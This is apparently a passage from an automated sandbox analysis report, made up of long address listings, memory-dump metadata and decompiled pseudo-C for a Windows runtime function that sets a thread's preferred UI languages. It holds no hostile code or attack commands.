                                                        0x00000000
                                                        0x048c2706
                                                        0x048c2706
                                                        0x048c270a
                                                        0x048c270a
                                                        0x048c270d
                                                        0x048c2713
                                                        0x048c2716
                                                        0x048c2718
                                                        0x048c271c
                                                        0x048c271e
                                                        0x04905b6c
                                                        0x04905b6f
                                                        0x04905b7f
                                                        0x04905b89
                                                        0x04905b8e
                                                        0x04905b93
                                                        0x04905b96
                                                        0x04905b9c
                                                        0x04905ba0
                                                        0x04905ba3
                                                        0x04905bab
                                                        0x04905bb0
                                                        0x04905bb3
                                                        0x04905bb3
                                                        0x04905ba3
                                                        0x048c2724
                                                        0x048c2726
                                                        0x048c2729
                                                        0x048c272c
                                                        0x048c279d
                                                        0x048c279d
                                                        0x048c27a0
                                                        0x048c27a2
                                                        0x00000000
                                                        0x048c272e
                                                        0x048c272e
                                                        0x048c2731
                                                        0x048c2734
                                                        0x048c2734
                                                        0x048c2736
                                                        0x04905bc1
                                                        0x04905bc1
                                                        0x04905bc4
                                                        0x00000000
                                                        0x04905bca
                                                        0x04905bca
                                                        0x04905bcd
                                                        0x00000000
                                                        0x04905bd3
                                                        0x00000000
                                                        0x04905bd3
                                                        0x04905bcd
                                                        0x048c273c
                                                        0x048c273c
                                                        0x048c2742
                                                        0x048c2747
                                                        0x048c274a
                                                        0x048c274d
                                                        0x048c2750
                                                        0x00000000
                                                        0x048c2756
                                                        0x048c2756
                                                        0x00000000
                                                        0x048c2902
                                                        0x048c2908
                                                        0x048c290b
                                                        0x00000000
                                                        0x048c2911
                                                        0x048c291c
                                                        0x048c2921
                                                        0x00000000
                                                        0x048c2921
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2880
                                                        0x048c2887
                                                        0x048c288c
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2805
                                                        0x048c280a
                                                        0x048c2814
                                                        0x048c2816
                                                        0x00000000
                                                        0x00000000
                                                        0x048c281e
                                                        0x048c2821
                                                        0x048c2823
                                                        0x00000000
                                                        0x048c2829
                                                        0x048c2829
                                                        0x048c2831
                                                        0x048c283c
                                                        0x048c283e
                                                        0x00000000
                                                        0x048c283e
                                                        0x00000000
                                                        0x00000000
                                                        0x048c284e
                                                        0x048c2850
                                                        0x048c2851
                                                        0x048c2854
                                                        0x048c2857
                                                        0x048c285a
                                                        0x048c285c
                                                        0x048c285d
                                                        0x00000000
                                                        0x00000000
                                                        0x048c275d
                                                        0x048c2761
                                                        0x00000000
                                                        0x048c2767
                                                        0x048c276e
                                                        0x048c2773
                                                        0x048c2773
                                                        0x048c2776
                                                        0x048c2778
                                                        0x048c277e
                                                        0x048c277e
                                                        0x048c2781
                                                        0x048c2781
                                                        0x048c2783
                                                        0x048c2784
                                                        0x00000000
                                                        0x00000000
                                                        0x04905bd8
                                                        0x04905bde
                                                        0x04905be4
                                                        0x04905be6
                                                        0x04905be8
                                                        0x04905be9
                                                        0x04905bee
                                                        0x04905bf8
                                                        0x04905bff
                                                        0x04905c01
                                                        0x04905c04
                                                        0x04905c07
                                                        0x04905c0b
                                                        0x04905c0d
                                                        0x04905c0d
                                                        0x04905c15
                                                        0x04905c18
                                                        0x04905c1b
                                                        0x04905c1b
                                                        0x04905c1e
                                                        0x00000000
                                                        0x00000000
                                                        0x048c28c3
                                                        0x048c28c8
                                                        0x048c28d2
                                                        0x048c28d4
                                                        0x048c28d8
                                                        0x048c28db
                                                        0x04905c26
                                                        0x04905c28
                                                        0x04905c2d
                                                        0x04905c2d
                                                        0x00000000
                                                        0x00000000
                                                        0x04905c34
                                                        0x04905c36
                                                        0x04905c49
                                                        0x04905c4e
                                                        0x04905c54
                                                        0x04905c5b
                                                        0x04905c5d
                                                        0x04905c60
                                                        0x048c2788
                                                        0x048c2788
                                                        0x048c278b
                                                        0x048c278e
                                                        0x048c278e
                                                        0x048c278e
                                                        0x048c2791
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2756
                                                        0x048c2750
                                                        0x00000000
                                                        0x048c2794
                                                        0x048c2794
                                                        0x048c2795
                                                        0x048c2798
                                                        0x048c2798
                                                        0x00000000
                                                        0x048c2734
                                                        0x048c272c
                                                        0x048c2700
                                                        0x048c25ef
                                                        0x048c25ef
                                                        0x048c25ef
                                                        0x048c25f2
                                                        0x048c25f8
                                                        0x00000000
                                                        0x00000000
                                                        0x048c25fe
                                                        0x00000000
                                                        0x048c28e6
                                                        0x048c28ec
                                                        0x048c28ef
                                                        0x048c28f5
                                                        0x048c28f8
                                                        0x048c28f8
                                                        0x00000000
                                                        0x048c28f8
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2866
                                                        0x048c2866
                                                        0x048c2876
                                                        0x048c2879
                                                        0x00000000
                                                        0x00000000
                                                        0x048c27e0
                                                        0x048c27e7
                                                        0x048c27e9
                                                        0x048c27eb
                                                        0x04905afd
                                                        0x00000000
                                                        0x04905afd
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2633
                                                        0x048c2638
                                                        0x048c263b
                                                        0x048c263c
                                                        0x048c263e
                                                        0x048c2640
                                                        0x048c2642
                                                        0x048c2647
                                                        0x048c2649
                                                        0x048c264e
                                                        0x048c2650
                                                        0x048c2653
                                                        0x048c2659
                                                        0x048c26a2
                                                        0x048c26a7
                                                        0x048c26ac
                                                        0x048c26b2
                                                        0x04905b11
                                                        0x04905b15
                                                        0x04905b17
                                                        0x00000000
                                                        0x048c26b8
                                                        0x048c26b8
                                                        0x048c26ba
                                                        0x048c27a6
                                                        0x048c27a6
                                                        0x048c27a9
                                                        0x048c27ab
                                                        0x048c27b9
                                                        0x048c27b9
                                                        0x048c27be
                                                        0x048c27c1
                                                        0x048c27c3
                                                        0x048c27c5
                                                        0x048c27c7
                                                        0x04905c74
                                                        0x04905c79
                                                        0x04905c79
                                                        0x048c27c7
                                                        0x00000000
                                                        0x048c26c0
                                                        0x048c26c0
                                                        0x048c26c3
                                                        0x048c26c6
                                                        0x048c26c6
                                                        0x048c26c9
                                                        0x048c26c9
                                                        0x00000000
                                                        0x048c26c9
                                                        0x048c26ba
                                                        0x048c265b
                                                        0x048c265b
                                                        0x048c265e
                                                        0x048c2667
                                                        0x048c266d
                                                        0x048c2677
                                                        0x048c267c
                                                        0x048c267f
                                                        0x048c2681
                                                        0x04905b49
                                                        0x04905b4e
                                                        0x048c27cd
                                                        0x048c27d0
                                                        0x048c27d1
                                                        0x048c27d2
                                                        0x048c27d4
                                                        0x048c27dd
                                                        0x048c2687
                                                        0x048c2687
                                                        0x048c268a
                                                        0x048c268b
                                                        0x048c268e
                                                        0x048c268f
                                                        0x048c2691
                                                        0x048c2696
                                                        0x048c2698
                                                        0x048c269d
                                                        0x048c269f
                                                        0x00000000
                                                        0x048c269f
                                                        0x048c2681
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2846
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2605
                                                        0x048c260a
                                                        0x048c260c
                                                        0x048c2611
                                                        0x048c2616
                                                        0x048c2619
                                                        0x048c2619
                                                        0x048c261e
                                                        0x00000000
                                                        0x048c2624
                                                        0x048c2627
                                                        0x048c2627
                                                        0x00000000
                                                        0x00000000
                                                        0x04905b1f
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2894
                                                        0x048c289b
                                                        0x048c289d
                                                        0x048c28a1
                                                        0x04905b2b
                                                        0x04905b2e
                                                        0x04905b2e
                                                        0x048c28a7
                                                        0x048c28a9
                                                        0x04905b04
                                                        0x04905b09
                                                        0x04905b09
                                                        0x04905b09
                                                        0x00000000
                                                        0x00000000
                                                        0x04905b35
                                                        0x04905b3c
                                                        0x048c28fb
                                                        0x048c28fb
                                                        0x048c26cc
                                                        0x048c26cc
                                                        0x048c26d0
                                                        0x00000000
                                                        0x048c26d2
                                                        0x048c26d2
                                                        0x00000000
                                                        0x048c26d2
                                                        0x00000000
                                                        0x00000000
                                                        0x048c25fe
                                                        0x048c292d
                                                        0x048c292f
                                                        0x048c2930
                                                        0x048c2935
                                                        0x048c2937
                                                        0x048c293a
                                                        0x048c2941
                                                        0x048c2946
                                                        0x048c294d
                                                        0x048c294e
                                                        0x048c2950
                                                        0x048c2952
                                                        0x048c2959
                                                        0x048c295b
                                                        0x048c295e
                                                        0x048c2966
                                                        0x048c296e
                                                        0x048c296f
                                                        0x048c2972
                                                        0x048c2976
                                                        0x048c297d
                                                        0x048c297e
                                                        0x048c297f
                                                        0x048c2980
                                                        0x048c2981
                                                        0x048c2982
                                                        0x048c2983
                                                        0x048c2984
                                                        0x048c2985
                                                        0x048c2986
                                                        0x048c2987
                                                        0x048c2988
                                                        0x048c2989
                                                        0x048c298a
                                                        0x048c298b
                                                        0x048c298c
                                                        0x048c298d
                                                        0x048c298e
                                                        0x048c298f
                                                        0x048c2990
                                                        0x048c2992
                                                        0x048c2997
                                                        0x048c29a3
                                                        0x048c29a6
                                                        0x048c29ab
                                                        0x048c29ad
                                                        0x048c29b0
                                                        0x048c29b2
                                                        0x04905c80
                                                        0x048c29b8
                                                        0x048c29b8
                                                        0x048c29bb
                                                        0x048c29c0
                                                        0x048c29c5
                                                        0x048c29c6
                                                        0x048c29c6
                                                        0x048c29c9
                                                        0x048c29cb
                                                        0x00000000
                                                        0x00000000
                                                        0x048c29cd
                                                        0x048c29d0
                                                        0x048c29d9
                                                        0x048c29db
                                                        0x048c29dd
                                                        0x048c2a7f
                                                        0x048c2a84
                                                        0x048c2a87
                                                        0x048c2a89
                                                        0x04905ca1
                                                        0x04905ca3
                                                        0x00000000
                                                        0x048c2a8f
                                                        0x048c2a8f
                                                        0x00000000
                                                        0x048c2a8f
                                                        0x00000000
                                                        0x048c29e3
                                                        0x048c29e3
                                                        0x048c29e3
                                                        0x00000000
                                                        0x048c29e3
                                                        0x048c29dd
                                                        0x00000000
                                                        0x048c29db
                                                        0x048c29e6
                                                        0x048c29e9
                                                        0x048c29eb
                                                        0x048c29ed
                                                        0x048c29f3
                                                        0x048c29f5
                                                        0x048c29f8
                                                        0x048c29fa
                                                        0x048c2a97
                                                        0x048c2a9a
                                                        0x048c2a9d
                                                        0x048c2add
                                                        0x00000000
                                                        0x048c2a9f
                                                        0x048c2aa2
                                                        0x048c2aa5
                                                        0x048c2aa8
                                                        0x048c2aab
                                                        0x04905cab
                                                        0x04905caf
                                                        0x04905cc5
                                                        0x04905cda
                                                        0x04905cdc
                                                        0x04905cdf
                                                        0x04905ce5
                                                        0x00000000
                                                        0x04905ceb
                                                        0x04905ced
                                                        0x04905cee
                                                        0x00000000
                                                        0x04905cee
                                                        0x04905cb1
                                                        0x04905cb4
                                                        0x04905cb9
                                                        0x04905cbb
                                                        0x00000000
                                                        0x04905cbd
                                                        0x04905cbd
                                                        0x00000000
                                                        0x04905cbd
                                                        0x04905cbb
                                                        0x048c2ab1
                                                        0x048c2ab1
                                                        0x048c2ac4
                                                        0x048c2ac6
                                                        0x048c2ac6
                                                        0x00000000
                                                        0x048c2ac6
                                                        0x048c2aab
                                                        0x00000000
                                                        0x048c2a00
                                                        0x048c2a09
                                                        0x048c2a0e
                                                        0x048c2a21
                                                        0x048c2a24
                                                        0x048c2a35
                                                        0x048c2a3a
                                                        0x048c2a3d
                                                        0x048c2a42
                                                        0x048c2a59
                                                        0x048c2a59
                                                        0x048c2a5c
                                                        0x048c2a5f
                                                        0x048c2a5f
                                                        0x048c29fa
                                                        0x048c29f3
                                                        0x048c2a64
                                                        0x048c2a64
                                                        0x048c2a6b
                                                        0x048c2a6b
                                                        0x048c2a6d
                                                        0x048c2a72
                                                        0x048c2a72
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        • Opcode ID: 048e29671ab4fe6721bae200d46749000847501a186d60f9f8dbb03a66f53a30
                                                        • Instruction ID: afbd5eab6976c6e077a4440634ceb95460b6ea8155166be0628679e18300e0f0
                                                        • Opcode Fuzzy Hash: 048e29671ab4fe6721bae200d46749000847501a186d60f9f8dbb03a66f53a30
                                                        • Instruction Fuzzy Hash: 6CC16971E40219ABDB25DFA8D880AADB7B1FF48714F454A6DE901EB290E774B801CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E048CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E048AEEF0(0x4987b60);
					_t134 =  *0x4987b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4987b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4987b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E048A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E048A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04938938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0489B150();
													}
													_t116 = E04936D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E048A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4988638; // 0x271af0
																	_t122 = L048A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E048A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E048A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L048CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L048A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E048CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E048CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E048CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E048CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E048CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4987b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4987b84 = _t75;
						_t73 = E048AEB70(_t134, 0x4987b60);
						if( *0x4987b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E048AFF60( *0x4987b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                        0x048cfab0
                                                        0x048cfab2
                                                        0x048cfab3
                                                        0x048cfab4
                                                        0x048cfabc
                                                        0x048cfac0
                                                        0x048cfb14
                                                        0x048cfb17
                                                        0x048cfac2
                                                        0x048cfac8
                                                        0x048cfacd
                                                        0x048cfad3
                                                        0x048cfad3
                                                        0x048cfadd
                                                        0x048cfb18
                                                        0x048cfb1b
                                                        0x048cfb1d
                                                        0x048cfb1e
                                                        0x048cfb1f
                                                        0x048cfb20
                                                        0x048cfb21
                                                        0x048cfb22
                                                        0x048cfb23
                                                        0x048cfb24
                                                        0x048cfb25
                                                        0x048cfb26
                                                        0x048cfb27
                                                        0x048cfb28
                                                        0x048cfb29
                                                        0x048cfb2a
                                                        0x048cfb2b
                                                        0x048cfb2c
                                                        0x048cfb2d
                                                        0x048cfb2e
                                                        0x048cfb2f
                                                        0x048cfb3a
                                                        0x048cfb3b
                                                        0x048cfb3e
                                                        0x048cfb41
                                                        0x048cfb44
                                                        0x048cfb47
                                                        0x048cfb4a
                                                        0x048cfb4d
                                                        0x048cfb53
                                                        0x0490bdcb
                                                        0x0490bdcb
                                                        0x048cfb59
                                                        0x048cfb5b
                                                        0x048cfb5b
                                                        0x048cfb5e
                                                        0x0490bdd5
                                                        0x0490bdd8
                                                        0x00000000
                                                        0x0490bdda
                                                        0x00000000
                                                        0x0490bdda
                                                        0x048cfb64
                                                        0x048cfb64
                                                        0x048cfb64
                                                        0x048cfb67
                                                        0x048cfb6e
                                                        0x048cfb70
                                                        0x048cfb72
                                                        0x00000000
                                                        0x048cfb78
                                                        0x048cfb7a
                                                        0x048cfb7a
                                                        0x048cfb7d
                                                        0x048cfb80
                                                        0x0490bddf
                                                        0x0490bde1
                                                        0x00000000
                                                        0x0490bde3
                                                        0x00000000
                                                        0x0490bde3
                                                        0x048cfb86
                                                        0x048cfb86
                                                        0x048cfb86
                                                        0x048cfb8b
                                                        0x048cfb90
                                                        0x048cfb92
                                                        0x048cfb94
                                                        0x048cfb9a
                                                        0x048cfb9b
                                                        0x048cfba1
                                                        0x0490bde8
                                                        0x0490bdeb
                                                        0x0490bded
                                                        0x0490beb5
                                                        0x0490beb5
                                                        0x0490bebb
                                                        0x0490bebd
                                                        0x0490bec3
                                                        0x0490bed2
                                                        0x0490bedd
                                                        0x0490bedd
                                                        0x0490beed
                                                        0x00000000
                                                        0x0490bdf3
                                                        0x0490bdfe
                                                        0x0490be06
                                                        0x0490be0b
                                                        0x0490be0d
                                                        0x0490be0f
                                                        0x0490be14
                                                        0x0490be19
                                                        0x0490be20
                                                        0x0490be25
                                                        0x0490be27
                                                        0x0490be35
                                                        0x0490be39
                                                        0x0490be46
                                                        0x0490be4f
                                                        0x0490be54
                                                        0x0490be56
                                                        0x0490bef8
                                                        0x0490bef8
                                                        0x00000000
                                                        0x0490be5c
                                                        0x0490be5c
                                                        0x0490be60
                                                        0x00000000
                                                        0x0490be66
                                                        0x0490be66
                                                        0x0490be7f
                                                        0x0490be84
                                                        0x0490be87
                                                        0x0490be89
                                                        0x0490be8b
                                                        0x0490be99
                                                        0x0490be9d
                                                        0x0490bea0
                                                        0x0490beac
                                                        0x0490beaf
                                                        0x0490beb1
                                                        0x0490beb3
                                                        0x0490beb3
                                                        0x00000000
                                                        0x0490bea2
                                                        0x0490bea2
                                                        0x00000000
                                                        0x0490bea2
                                                        0x0490be8d
                                                        0x0490be8d
                                                        0x0490be92
                                                        0x00000000
                                                        0x0490be92
                                                        0x0490be8b
                                                        0x0490be60
                                                        0x0490be3b
                                                        0x0490be3b
                                                        0x0490be3e
                                                        0x00000000
                                                        0x0490be40
                                                        0x0490be40
                                                        0x0490be44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0490be44
                                                        0x0490be3e
                                                        0x0490be29
                                                        0x0490be29
                                                        0x00000000
                                                        0x0490be29
                                                        0x0490be27
                                                        0x00000000
                                                        0x048cfba7
                                                        0x048cfba7
                                                        0x048cfbab
                                                        0x0490bf02
                                                        0x048cfbb1
                                                        0x048cfbb1
                                                        0x048cfbb8
                                                        0x048cfbbd
                                                        0x048cfbbd
                                                        0x048cfbbf
                                                        0x048cfbbf
                                                        0x048cfbc5
                                                        0x048cfbcb
                                                        0x048cfbf8
                                                        0x048cfbf8
                                                        0x048cfbfa
                                                        0x00000000
                                                        0x048cfc00
                                                        0x048cfc00
                                                        0x048cfc03
                                                        0x00000000
                                                        0x048cfc09
                                                        0x048cfc09
                                                        0x048cfc0f
                                                        0x048cfc15
                                                        0x048cfc23
                                                        0x048cfc23
                                                        0x048cfc25
                                                        0x048cfc27
                                                        0x048cfc75
                                                        0x048cfc7c
                                                        0x048cfc84
                                                        0x00000000
                                                        0x048cfc29
                                                        0x048cfc29
                                                        0x048cfc2d
                                                        0x048cfc30
                                                        0x0490bf0f
                                                        0x00000000
                                                        0x048cfc36
                                                        0x048cfc38
                                                        0x048cfc3b
                                                        0x048cfc41
                                                        0x0490bf17
                                                        0x0490bf19
                                                        0x0490bf48
                                                        0x0490bf4b
                                                        0x00000000
                                                        0x0490bf1b
                                                        0x0490bf22
                                                        0x0490bf24
                                                        0x0490bf26
                                                        0x00000000
                                                        0x0490bf2c
                                                        0x0490bf37
                                                        0x0490bf39
                                                        0x0490bf3b
                                                        0x00000000
                                                        0x0490bf41
                                                        0x0490bf41
                                                        0x0490bf41
                                                        0x0490bf41
                                                        0x0490bf45
                                                        0x00000000
                                                        0x0490bf45
                                                        0x0490bf3b
                                                        0x0490bf26
                                                        0x00000000
                                                        0x048cfc47
                                                        0x048cfc47
                                                        0x048cfc49
                                                        0x048cfcb2
                                                        0x048cfcb4
                                                        0x048cfcb6
                                                        0x048cfcdc
                                                        0x048cfcdc
                                                        0x00000000
                                                        0x048cfcb8
                                                        0x048cfcc3
                                                        0x048cfcc5
                                                        0x048cfcc7
                                                        0x00000000
                                                        0x048cfcc9
                                                        0x048cfcc9
                                                        0x048cfccd
                                                        0x00000000
                                                        0x048cfccd
                                                        0x048cfcc7
                                                        0x00000000
                                                        0x048cfc4b
                                                        0x048cfc4b
                                                        0x048cfc4e
                                                        0x048cfc4e
                                                        0x048cfc51
                                                        0x048cfc51
                                                        0x048cfc54
                                                        0x048cfc5a
                                                        0x048cfc5c
                                                        0x048cfc5f
                                                        0x048cfc61
                                                        0x048cfc63
                                                        0x048cfc65
                                                        0x048cfc67
                                                        0x048cfc6e
                                                        0x048cfc72
                                                        0x048cfc72
                                                        0x048cfc72
                                                        0x048cfc72
                                                        0x048cfc67
                                                        0x048cfc61
                                                        0x00000000
                                                        0x048cfc5a
                                                        0x048cfc49
                                                        0x048cfc41
                                                        0x048cfc30
                                                        0x048cfc27
                                                        0x048cfc03
                                                        0x048cfbcd
                                                        0x048cfbd3
                                                        0x048cfbd9
                                                        0x048cfbdc
                                                        0x048cfbde
                                                        0x048cfc99
                                                        0x048cfc9b
                                                        0x048cfc9d
                                                        0x048cfcd5
                                                        0x048cfcd5
                                                        0x048cfc89
                                                        0x048cfc89
                                                        0x00000000
                                                        0x048cfc9f
                                                        0x048cfc9f
                                                        0x048cfca3
                                                        0x00000000
                                                        0x048cfca3
                                                        0x00000000
                                                        0x048cfbe4
                                                        0x048cfbe4
                                                        0x048cfbe4
                                                        0x048cfbe4
                                                        0x048cfbe9
                                                        0x048cfbf2
                                                        0x00000000
                                                        0x048cfbf2
                                                        0x048cfbde
                                                        0x048cfbcb
                                                        0x048cfbab
                                                        0x048cfc8b
                                                        0x048cfc8b
                                                        0x048cfc8c
                                                        0x048cfb80
                                                        0x048cfb72
                                                        0x048cfb5e
                                                        0x048cfc8d
                                                        0x048cfc91
                                                        0x048cfadf
                                                        0x048cfadf
                                                        0x048cfae1
                                                        0x048cfae4
                                                        0x048cfae7
                                                        0x048cfaec
                                                        0x048cfaf8
                                                        0x048cfb00
                                                        0x048cfb07
                                                        0x048cfb0f
